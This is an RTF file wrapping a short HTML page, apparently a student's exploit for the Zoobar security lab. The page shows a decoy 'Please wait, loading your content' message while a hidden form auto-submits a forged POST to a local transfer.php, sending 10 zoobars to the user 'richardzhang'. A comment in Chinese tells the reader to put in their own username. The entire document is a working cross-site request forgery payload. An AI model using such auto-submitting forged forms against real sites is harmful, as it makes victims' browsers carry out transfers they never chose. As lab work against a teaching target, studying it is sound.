{\rtf1\ansi\ansicpg936\cocoartf2822
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fnil\fcharset0 HelveticaNeue;}
{\colortbl;\red255\green255\blue255;\red14\green13\blue38;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c6667\c6667\c20000;\cssrgb\c0\c0\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11520\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs26 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 <!DOCTYPE html>\
<html>\
<head><title>Loading...</title></head>\
<body>\
  <h1>Please wait, loading your content...</h1>\
\
  <form id="csrfForm" method="POST" action="http://localhost:7070/transfer.php">\
    <input name="zoobars" value="10">\
    <input name="recipient" value=\'93
\fs29\fsmilli14667 \cf0 \outl0\strokewidth0 richardzhang
\fs26 \cf2 \outl0\strokewidth0 \strokec2 \'94>  <!-- \uc0\u25913 \u25104 \u20320 \u30340 \u29992 \u25143 \u21517  -->\
  </form>\
\
  <script>\
    document.getElementById('csrfForm').submit();\
  </script>\
</body>\
</html>}